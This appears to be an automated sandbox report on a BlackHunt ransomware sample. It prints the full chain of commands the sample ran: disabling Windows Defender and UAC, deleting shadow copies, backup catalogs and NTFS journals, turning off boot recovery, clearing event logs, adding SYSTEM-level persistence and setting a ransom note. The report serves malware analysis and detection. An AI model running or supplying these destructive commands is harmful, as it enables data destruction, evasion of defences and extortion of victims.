PID 4752 wrote to memory of 4040 4752 Conhost.exe 116 PID 4752 wrote to memory of 4040 4752 Conhost.exe 116 PID 3292 wrote to memory of 5080 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 194 PID 3292 wrote to memory of 5080 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 194 PID 2256 wrote to memory of 4012 2256 cmd.exe 160 PID 2256 wrote to memory of 4012 2256 cmd.exe 160 PID 3292 wrote to memory of 4548 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 120 PID 3292 wrote to memory of 4548 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 120 PID 3292 wrote to memory of 2400 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 122 PID 3292 wrote to memory of 2400 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 122 PID 3484 wrote to memory of 4208 3484 cmd.exe 123 PID 3484 wrote to memory of 4208 3484 cmd.exe 123 PID 5080 wrote to memory of 208 5080 cmd.exe 125 PID 5080 wrote to memory of 208 5080 cmd.exe 125 PID 3292 wrote to memory of 2296 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 186 PID 3292 wrote to memory of 2296 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 186 PID 4548 wrote to memory of 4652 4548 cmd.exe 129 PID 4548 wrote to memory of 4652 4548 cmd.exe 129 PID 3292 wrote to memory of 1244 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 128 PID 3292 wrote to memory of 1244 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 128 PID 2400 wrote to memory of 1396 2400 cmd.exe 174 PID 2400 wrote to memory of 1396 2400 cmd.exe 174 PID 3292 wrote to memory of 4732 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 132 PID 3292 wrote to memory of 4732 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 132 PID 3292 wrote to memory of 3916 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 134 PID 3292 wrote to memory of 3916 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 134 PID 3292 wrote to memory of 2288 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 137 PID 3292 wrote to memory of 2288 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 137 PID 3292 wrote to memory of 920 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 136 PID 3292 wrote to memory of 920 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 136 PID 3292 wrote to memory of 2312 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 142 PID 3292 wrote to memory of 2312 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 142 PID 3292 wrote to memory of 4372 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 143 PID 3292 wrote to memory of 4372 3292 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe 143 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe"C:\Users\Admin\AppData\Local\Temp\5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3292 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵PID:632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:4752
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:5080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2296
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4732
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:920
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2288
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2312
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4372
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:384
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:3824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4132
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2124
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵
- Adds Run key to start application
PID:632 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:9504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4012
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:5308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:9356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4860
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:10076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe" /F2⤵PID:2508
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5cb261c040f9dace4df8eece7c3f8f77e344ddaf28383d3947695bbffc8c1435.exe" /F3⤵
- Creates scheduled task(s)
PID:5152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1396
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:10124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:808
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3528
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3428
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4516
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3228
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:456
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1852
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3088
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:6096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:16692
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:16144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:12816
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:8516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:4756
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:7892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:7040
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5596
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:13968
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:15744
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:16944
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5692
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:6636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:10028
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:10728
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:16764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:12292
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:17216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:12380
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:17200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:8076
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:16472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:9512
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:16756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2456
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:16504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:17264
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:16560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:17240
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:16576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:17096
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:16412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14252
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:16536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:17072
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:16572
-
-
-
